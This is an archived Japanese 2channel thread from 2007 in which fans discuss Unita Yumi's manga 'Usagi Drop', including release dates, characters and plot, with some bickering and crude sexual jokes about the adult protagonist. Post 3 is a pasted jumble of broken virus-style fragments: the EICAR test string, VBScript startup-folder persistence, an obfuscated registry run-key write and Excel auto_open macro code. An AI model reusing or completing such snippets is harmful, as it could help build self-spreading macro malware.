2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

★宇仁田ゆみ2★

1 :花と名無しさん:2007/09/01(土) 02:31:45 ID:???0
前スレ
★宇仁田ゆみ★
http://anime2.2ch.net/test/read.cgi/gcomic/1058183435/

公式HP ウニタコウボウ
http://homepage2.nifty.com/unita/

2 :花と名無しさん:2007/09/01(土) 02:35:10 ID:???0
過去スレ
アニマルの隠れキャラ宇仁田ゆみ
http://salad.2ch.net/comic/kako/999/999696011.html
★宇仁田ゆみ★
http://anime2.2ch.net/test/read.cgi/gcomic/1058183435/


連載中作品
「うさぎドロップ」 フィールヤング毎月8日発売
「よにんぐらし」 まんがライフオリジナル毎月11日発売

3 :花と名無しさん:2007/09/01(土) 03:04:07 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


4 :花と名無しさん:2007/09/01(土) 10:46:36 ID:???0
>>1
キンポ乙

5 :花と名無しさん:2007/09/01(土) 16:23:49 ID:???0
>>1
乙。
うさぎの新刊が待ち遠しい。
今回の表紙は何色か?
個人的にはオレンジと予想。

6 :花と名無しさん:2007/09/03(月) 23:06:38 ID:???O
>>1

>>5
黄色と予想

7 :花と名無しさん:2007/09/08(土) 05:52:25 ID:pxKlhh940
>>1


8 :花と名無しさん:2007/09/08(土) 08:02:18 ID:???0
うさぎドロップ第3巻 10月8日発売予定

9 :花と名無しさん:2007/09/08(土) 08:06:34 ID:???0

間違えた。
10月6日発売予定でした。

10 :花と名無しさん:2007/09/09(日) 22:53:42 ID:iOQcaAMz0
「バナナチップ食べ過ぎて気持ち悪くなる」ってのスッゲー禿同なんですけどwwww
俺も調子こいて食べ過ぎて気持ち悪くなってそれ以来トラウマだも。見るのも嫌


11 :花と名無しさん:2007/09/15(土) 23:20:05 ID:???0


12 :花と名無しさん:2007/09/26(水) 16:21:29 ID:???0
3巻はサイン本の販売しないんですかね・・・

13 :花と名無しさん:2007/10/04(木) 21:34:30 ID:???0
よにんぐらし3巻発売時にサイン本の販売をしていたのを今気付いた

14 :花と名無しさん:2007/10/06(土) 18:26:25 ID:???O
上げ

15 :花と名無しさん:2007/10/06(土) 19:02:12 ID:no62ZWvq0
新刊アゲ

16 :花と名無しさん:2007/10/07(日) 02:20:23 ID:???0
この人の漫画は売れてる分けじゃないけど
新刊発売してもこの過疎っぷりってのはちょっと悲しいね

17 :花と名無しさん:2007/10/07(日) 02:50:15 ID:???O
うさぎドロップってどんな話なの?


18 :花と名無しさん:2007/10/07(日) 02:54:27 ID:???0
おっと発売日だったのか 近くの本屋じゃ置いてないからなー

19 :花と名無しさん:2007/10/07(日) 04:05:35 ID:???0
>>17
爺さんの葬式で、爺さんに隠し子(5)がいたということが発覚し
引き取り手がいないので主人公(30)が育てることにした、という話

>>18
うちの近くの書店では10冊くらい入荷しててびっくりした

20 :17:2007/10/07(日) 07:31:39 ID:mmFfzjkcO
>>19
親切にありがとうございます
なかなか面白そうなんで楽天で注文してきました

21 :花と名無しさん:2007/10/07(日) 21:26:27 ID:KSPCb2ui0
近所のTSUTAYAで買った。
1巻発売時には入荷ゼロ、
2巻発売時には入荷1冊のみだったのに、
3巻は8冊も入荷していた。

テレビや雑誌で取り上げられたからだな。

22 :花と名無しさん:2007/10/08(月) 01:39:06 ID:???0
>>テレビや雑誌で取り上げられたからだな。

マジでか
そのうちドラマ化しちゃったりして

23 :5:2007/10/08(月) 15:33:50 ID:???0
ようやく新刊GET。
表紙は…山吹色かな?
内容に引っ掛けて金木犀の色?
微妙に予想外れた…。

それにしてもうさぎを読むと和む。

24 :花と名無しさん:2007/10/08(月) 21:24:03 ID:???O
背表紙つながってるんだな 3巻にしてようやく気が付いた
久々にアカイチゴシロイチゴ読んだけど中々良かった
前はマニマニのが好きだったけど今はイチゴのが好きかも
定期テストが終わったらゆくゆくも買おう
それにしてもうさぎは本当になごむ
最近じゃなごみ≒萌えみたいな風潮があるから、萌え要素のないうさぎは好き

25 :花と名無しさん:2007/10/09(火) 02:29:34 ID:???0
りんはすげー萌えるし、コウキママもいい
萌え要素いっぱいだな

26 :花と名無しさん:2007/10/09(火) 13:20:55 ID:???0
大吉も萌え要素満載じゃないか。白目むいて寝てるとことかw

りんちゃんもう小学生なんだなあ。他人の家の子は成長はやい。

27 :花と名無しさん:2007/10/09(火) 14:40:12 ID:???0
5歳なんだから漫画の話だとしても早くない

28 :花と名無しさん:2007/10/11(木) 20:21:32 ID:???O
連載追いかけてなくて3巻読んだけど、大吉と正子さんの
距離が縮まっている気がしてとてもイヤ。

29 :花と名無しさん:2007/10/11(木) 21:53:16 ID:9A2bhxOd0
>>28
>大吉と正子さんの距離が縮まっている気がしてとてもイヤ。
俺も嫌だ。
正子は最低な女だと思う。
あんな女は孤独に生きるべきだと思う。

30 :花と名無しさん:2007/10/11(木) 22:09:07 ID:???0
りんは祖父の子供じゃないような気が…

31 :花と名無しさん:2007/10/11(木) 23:05:48 ID:???0
大吉と正子さんがくっつくような事にだけは
絶対になってほしくないな
どうせならコウキママとくっつく方がマシ

32 :花と名無しさん:2007/10/11(木) 23:39:44 ID:???0
やっぱりんとだろ

33 :花と名無しさん:2007/10/13(土) 03:48:10 ID:???0
>>32
ないだろ
ユウキママとくっつくこともないんじゃないかなー、と予測している
そうなったらやっすいメロドラマじゃん

個人的には、ね


この漫画読むと昨今のDQN親のニュースや評判も
やっぱり少数の人たちのが誇大的に流されてるだけなんだよな
と安心する

34 :花と名無しさん:2007/10/13(土) 19:15:15 ID:D9+LXiEM0
漫画をソースに安心とかってどんだけゆとりだよw

35 :花と名無しさん:2007/10/13(土) 19:48:48 ID:???0
>>22
ドラマ化されたらいつものドラマ限定原作レイプエピソードとかやるんだろうな。
んでブームになってちょっともりあがるけど所詮ブームなので後は下火と。
>>30
髪の色からしてあの人じゃないの?



36 :花と名無しさん:2007/10/13(土) 20:14:36 ID:???0
>>35
NHKドラマ愛の詩みたいな感じで

劣化具合は山下和美の天使みたい

知る人ぞ知る番組でブームにならないと思う

37 :花と名無しさん:2007/10/13(土) 20:21:11 ID:???0
>>36
作品タイトルは「」(もしくは『』)で括ってくれたほうが読みやすいと思った。

38 :花と名無しさん:2007/10/13(土) 21:01:53 ID:???O
>>35
いや、あの人ゲイだし…

39 :花と名無しさん:2007/10/14(日) 14:38:21 ID:???0
コウキママって美人だなぁ
ホステスかなんかやってるんだろうけどスレた感じが無くていいわ
一番の萌えキャラだね
ところでママさんの名前なんてーの?

40 :花と名無しさん:2007/10/14(日) 16:49:06 ID:???0
ホステスなのか?
昼間に働いてるような描写なかったっけ?

41 :花と名無しさん:2007/10/14(日) 17:04:36 ID:???0
流し読みのお子様が多いな

42 :花と名無しさん:2007/10/14(日) 18:22:11 ID:???O
>>40
昼間働いてるから迎えも遅いし小学校の三者面談では
半休とってきてたじゃない……

43 :花と名無しさん:2007/10/14(日) 23:12:39 ID:k9sRxC4IO
なんというゆとりレス。久々に脱力感。

44 :花と名無しさん:2007/10/15(月) 04:00:19 ID:???O
>>43
上げ厨が何を言う

45 :花と名無しさん:2007/10/15(月) 07:37:18 ID:???0
別にsage推奨なんてどこにも書いてませんが。

46 :花と名無しさん:2007/10/15(月) 12:58:44 ID:???0
読み返したら普通に昼間働いてるなw
当初の見た目で水商売って決め付けてたわ
結局名前は出てきてないね
コウキママはコウキママだな

47 :花と名無しさん:2007/10/16(火) 12:16:50 ID:???O
まんがタウン?かくらぶに実生活4こまが載ってる
琵琶植えてるのは作者本人だったんだね

48 :花と名無しさん:2007/10/16(火) 12:33:06 ID:???0
まんがタイムジャンボじゃね?

49 :花と名無しさん:2007/10/18(木) 03:32:49 ID:???0
コウキママは他のママさんとはひと味違うごっついカメラ使ってたんで
デザイン関係とかジャーナリズム関係とかの仕事をしてるんじゃないかと予想

50 :花と名無しさん:2007/10/18(木) 03:34:28 ID:???0
ここは、どんだけ童貞予想の多いスレなんだ・・・

51 :花と名無しさん:2007/10/18(木) 08:09:12 ID:???0
と、魔法使いが申しております。

52 :花と名無しさん:2007/10/18(木) 11:59:35 ID:???0
>>51
残念だったなwwwお前みたいな童貞と違って子持ちだよwwwwww

53 :花と名無しさん:2007/10/18(木) 13:41:12 ID:???O
>49
あーそしたらこども一人くらい養えるかもね

54 :花と名無しさん:2007/10/18(木) 16:52:38 ID:???0
>>50
コウキママについてあれこれ想像して楽しむのが童貞なのか?
おまえは美人の有効活用法を知らんのか、かわいそうに
しかも現実で美人には不自由していないから想像して楽しむ必要なんかない
っていうわけでもなさそうだよな

ダイキチの従姉妹も可愛いよなぁ
ああいう子に泣かれると俺は弱いのだ、ダイキチと違って
しかしコウキママみたいのに泣かれたら弱いどころか無条件降伏しかない
ちょっとドジっぽさを窺わせるところもまた萌えるねぇ

55 :花と名無しさん:2007/10/18(木) 17:35:53 ID:???O
>>54
キモさが足りない12点

56 :花と名無しさん:2007/10/18(木) 21:25:41 ID:???0
とりあえず予想なんてしたところで何?って感じだな
後に僕の予想当たりました^^すごい?って、かまってほしいのか?
我が子かわいいなら、一般人がいいカメラ持ってても不思議ではない
あの場面でカメラの種類分かって値段も分かるなら別だが
>>54
粘着レスもほどほどにしておけ、スレに合わんし必死すぎだ

57 :花と名無しさん:2007/10/18(木) 22:06:17 ID:???0
>>56
別におまえに褒めてもらおうなんざ思ってないだろ
漫画読んで好きな作品で好きなキャラがいて色々考えたり時には予想したりする、普通だろ
俺はスレに合わないとは思わないけどねぇ
作品について語るスレじゃないの?ここは?

カメラに関してはたいして高そうなものではなかったような・・・
しかも「周りのお母さんはみなカメラの準備とかバッチリなのに俺だけ・・・」みたいな描写だったしね
高級カメラ=高額取り、っていうことにはなってないんじゃないかな?

58 :花と名無しさん:2007/10/18(木) 22:27:30 ID:???0
>>57
スルー

59 :花と名無しさん:2007/10/19(金) 22:26:16 ID:oIvP2dHm0
りんちゃん

60 :花と名無しさん:2007/10/23(火) 20:04:23 ID:???0
3巻出たというのにスレ伸びないね

61 :花と名無しさん:2007/10/23(火) 20:49:01 ID:???0
本屋さんでうさぎを3冊まとめて買ったら
2巻だけ増刷分だった

ところでこの主人公はホモじゃないよね?

62 :花と名無しさん:2007/10/23(火) 22:56:51 ID:46Haop++0
>>61
>本屋さんでうさぎを3冊まとめて買ったら2巻だけ増刷分だった
残念だったねぇ。

>ところでこの主人公はホモじゃないよね?
どうしてそう思うの?


63 :花と名無しさん:2007/10/24(水) 12:52:45 ID:???0
女性が苦手発言からか?

64 :花と名無しさん:2007/10/24(水) 13:02:47 ID:???0
主人公は、人に迷惑をかけないようにと自覚してる
しっかりした奴だと思うなー

65 :花と名無しさん:2007/10/25(木) 13:04:40 ID:???0
まあダイキチはびっくりするくらい女に興味ないよね

66 :花と名無しさん:2007/10/25(木) 16:31:11 ID:???0
興味というか、そんな余裕がないだけじゃないかな

67 :花と名無しさん:2007/10/25(木) 22:59:57 ID:JaOMcrSw0
4巻が待ち遠しい。

68 :花と名無しさん:2007/10/26(金) 02:02:42 ID:???0
多分、普段言い寄られない(モテナイ)から女に慣れてないという設定だな

69 :花と名無しさん:2007/10/26(金) 02:25:10 ID:???0
もし童貞だったらちょっと引く

70 :花と名無しさん:2007/10/26(金) 20:20:00 ID:???0
>>68
ん?童貞だったの?w

71 :花と名無しさん:2007/10/29(月) 17:55:43 ID:???0
大吉たんのアナル犯したい

72 :花と名無しさん:2007/10/29(月) 18:24:37 ID:???0
スキマスキにはそれなりにかっこいいのに童貞ってキャラいたな
逆にチビで冴えないヤローが美女の恋人もちだったり

一連の作品群見ても、女大好きな(というか積極的にどうこする)男キャラはあんまりいないよな
脇キャラとかはともかく

73 :花と名無しさん:2007/10/29(月) 18:52:48 ID:???0
なんで三巻の話題が一切無いんだよ
ここの奴らは、ちゃんと買って読んでるのか?

74 :花と名無しさん:2007/10/29(月) 19:03:20 ID:???0
>>73
連載作品だから、連載してる時にも話題は出てるから
前スレ見てみ

75 :花と名無しさん:2007/10/29(月) 23:24:09 ID:???0
>>74
そりゃ分かるがコミックス派は、まったくいないんか

76 :花と名無しさん:2007/10/30(火) 10:40:57 ID:???0
>>75
このスレ前半にもちょこちょこ話題でてるよ

77 :花と名無しさん:2007/11/01(木) 23:55:30 ID:75RHruM00






78 :花と名無しさん:2007/11/02(金) 00:43:54 ID:???0
大吉たんとえっちしたい

79 :花と名無しさん:2007/11/07(水) 23:56:03 ID:882kS3tH0
よにんぐらし
うさぎドロップ



80 :花と名無しさん:2007/11/10(土) 14:32:55 ID:/wPchEfr0
よにんぐらし&ウサギドロップが面白かったので短編集買ってみた

orz…

81 :花と名無しさん:2007/11/10(土) 14:47:50 ID:???0
>>80
なんでそこで凹むんだ?短編集こそウニタ感がでまくっている気がするんだけど。

82 :花と名無しさん:2007/11/10(土) 15:33:57 ID:???0
今のほのぼの系作風好きが買ったら、正直初期作品は結構キツいかもな
やることやっちゃってるし

もっとも初期作品の作風好きにとっては、最近はほのぼのすぎて物足りんが



83 :花と名無しさん:2007/11/10(土) 18:56:57 ID:???0
やることやってるけど淡々としてるのがいいのにな

84 :花と名無しさん:2007/11/10(土) 19:03:02 ID:???0
やることがって、今時の少女コミックの方が見るに耐えない代物じゃね?
むしろいやらしくなくさっぱりしているからそれで好感持ったんだけど・・

85 :花と名無しさん:2007/11/10(土) 22:52:26 ID:???0
今月のうさぎ良かった
春子の事情って意外と普通だったんだな
だがそれがいい
来月はコウキママ登場?

86 :花と名無しさん:2007/11/10(土) 23:21:31 ID:???0
      ,.-;';';';';';';';';';';';';';
    /;';';';';';';';';';';';';';'
    ;';';';';';';';';'、          ´;、
   ;';';';';';';';'〃`丶ヾミ;、_       ´,.
   ;';';';';';';'|      `''丶V/〃ソ  ヾ
   ;';';';';';';'l              ゞ :;
  ';';';';';';'/  ____          |::|
  ;';';';';   / ─ニ三彡ノ 、__   |;l
 ヘヾ;';';     fエ:エi イ  チ─三;_|;l
 ハ}l;';'         /    {| fエエ)、`|l
             _,   '!ヽ` `' |
  |          /  _  }    /    こらっ!コウキ!ダイキチさんでしょ!
 トl|        _,.ヘ〃ゝィ,ノ    |
 | :l          ,.ト レ       /
  ヾ        !ー――‐r   /
   ヽ. . . . .   `ーー―'   /
    `' : : : : . .        /
      `'ヾ: : : : : : : : : : :/
          ==== '´|
   ハ\        / |

87 :花と名無しさん:2007/11/11(日) 00:05:01 ID:???0
>>83
春菊と比較してみた

春菊の恨み節が入ってない読切
“これから死にます”と
楽楽の
“KNOCK! KNOCK! KNOCK!〜ふたりのノゾミ”
話の内容はほぼ同じ
淡々と、やることやってるだけの平和な日々
.
.
.
自分も普通に読める
作家への先入観が悪いほうへ作用しなければ

88 :花と名無しさん:2007/11/11(日) 02:59:41 ID:???0
大振りから入った奴が、ヤサシイワタシ見ちゃったようなものかw

89 :花と名無しさん:2007/11/11(日) 14:41:51 ID:DudeWw3w0
短編集って喫煙シーン多いね
うさぎ・よにんに比べると

ちょっときつい印象かも

90 :花と名無しさん:2007/11/11(日) 22:53:50 ID:???0
>>89
設定が田舎のヤンキーが多いから

91 :花と名無しさん:2007/11/17(土) 16:27:00 ID:2oB+KWQq0
本田家の収入はいかほどなんだろう

92 :花と名無しさん:2007/11/21(水) 18:01:21 ID:???0
春子の旦那普通にいい人だな、あんまり心配かけるんじゃねえっての
「いつまでも女の子でいたかった」とかなんだそりゃ
逆に男が「いつまでも子供でいたい」って言って実行しちゃったらどーすんだよ


93 :花と名無しさん:2007/11/21(水) 21:18:04 ID:???0
この晴れ姿、見せる相手はもちろん…

前後の予告カットが違うだけで
楽しみが2倍に

94 :花と名無しさん:2007/11/21(水) 22:26:52 ID:iQnQFDcn0
age

95 :花と名無しさん:2007/11/24(土) 17:59:11 ID:???0
今日初めてうさぎドロップ読んだ。2巻まで
面白い。よつばとより現実的なのもいいね。

96 :花と名無しさん:2007/11/26(月) 08:37:14 ID:???0
まあよつばとはテーマが違うからな
よつばとは作中の時間は遅々として進まないから「成長」ってテーマは皆無だし
しかしいくら現実的だからって描けない部分は色々あるのはこっちも同様だろうなぁ
りんが小学校高学年だったらかなり微妙なことになってるだろうし
幼稚園〜小学校低学年くらいの年齢だからある程度現実的に描けるんじゃないかと思う

97 :花と名無しさん:2007/11/30(金) 03:24:56 ID:???0
>>92
遅レスだけど
春子にとっては全然いい人じゃねえだろ。
発言小町でも読んでこい

98 :花と名無しさん:2007/11/30(金) 11:05:40 ID:64OY3J5eO
短編集読了。めちゃくちゃよかった。
特にキンポの話。

99 :花と名無しさん:2007/11/30(金) 13:34:38 ID:???0
発言小町って何かと思って調べてみたら・・・
読んで来いってどういう意味でい言っているのか
「これでも読んで主婦の苦労を知れ!」って意味で言ってるならすごいな
それともネタ?

100 :花と名無しさん:2007/11/30(金) 16:33:45 ID:???0
>>99
バカに説明すんのめんどくせえな

春子の旦那家の家族構成は知らないけど、嫁入りした春子の立場に立てばみれば、
頼りなくて自分を庇わない(と思われる)旦那は、姑や小姑と同じく他人(敵)でしかないだろ
だから自分の娘と二人家族って話に繋がるんだろうが。

その登場人物の視点を理解出来ないで、どうやって物語を楽しんでるの?

101 :花と名無しさん:2007/11/30(金) 17:24:16 ID:dbTZWuFk0
>>100
春子の旦那が「頼りなくて嫁に冷たい旦那」だってどうやって分かるのかね?
当の春子だって具体例も挙げていない申告しかしていないじゃないの
少なくとも19・20話で分かるようにはなってないと思うけど、まあ頭が良い人なら理解できるんでしょうねぇ
発言小町を読むと春子の言い分だけを聞いて夫婦の関係を判断できないって思えそうだけど

別に春子に感情移入しなくても楽しめるでしょ?第一主人公はダイキチなんだし
登場人物全ての視点を理解できないと楽しめないのですか?頭が良い割には非効率ですね
私はダイキチと同じで春子の行動に違和感を感じていたし、作者はダイキチを通じて自分の結婚観なりを
表現するのかと思っていたのだけれどね


102 :花と名無しさん:2007/11/30(金) 18:32:55 ID:???0
>>100
保育園で一人待たされるコウタが可哀想!
幼い息子の面倒を見る算段がついていないのに離婚するコウタ母は自己中心的な最低女。

事情も知らずに適当な事を言っていいなら、どんないい人でもいい人とは言えないわな

103 :花と名無しさん:2007/11/30(金) 20:41:24 ID:???O
誰でもそうでしょ。他人からみて、生きざまや性格を皆ひとつの方向からとらえてるなんて思わないけど。

大吉だって、何独身三十路がりん育ててんだ、母親に返すのが筋って見方もあるし。

いろんな視点から鑑みるのも漫画の醍醐味では?
不用意に他人を攻撃するのは止めようよ。



104 :花と名無しさん:2007/12/01(土) 08:41:16 ID:???0
>>102
夫が女にだらしなく、その上DV野郎だったとしても?
現実にもそんなパターンは多く存在していると思われ。

105 :花と名無しさん:2007/12/01(土) 13:26:14 ID:???0
>>97>>99以降もほぼ全て私の自作自演でしたー
ごめんなさい。

もうこういうことでいいからつまらないこの流れは終了、
何事も無かったの如く普通の宇仁田話に移行という事で

106 :花と名無しさん:2007/12/01(土) 14:59:05 ID:???0
>>104
あー、そのなんだ・・・
>>102の主旨ってのはその真逆だよ真逆
一面しか見なかったら正当な評価なんてくだせませんよ、ってのが基本的な意見
具体例としてコウキママを出しているだけでさ
あなたの言う通り、夫が最低な奴かもしれなかったわけだしそうじゃなかったかもしれない
何も分からないのにコウキママが最低女とは言えないでしょ、ということが言いたいんだよ

>>105
この話をお開きにするのはいいとしてそういう言い方では収まらないよ?

107 :花と名無しさん:2007/12/04(火) 02:17:18 ID:g/m3VKsW0
大吉たんのアナルに挿入したい

23 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)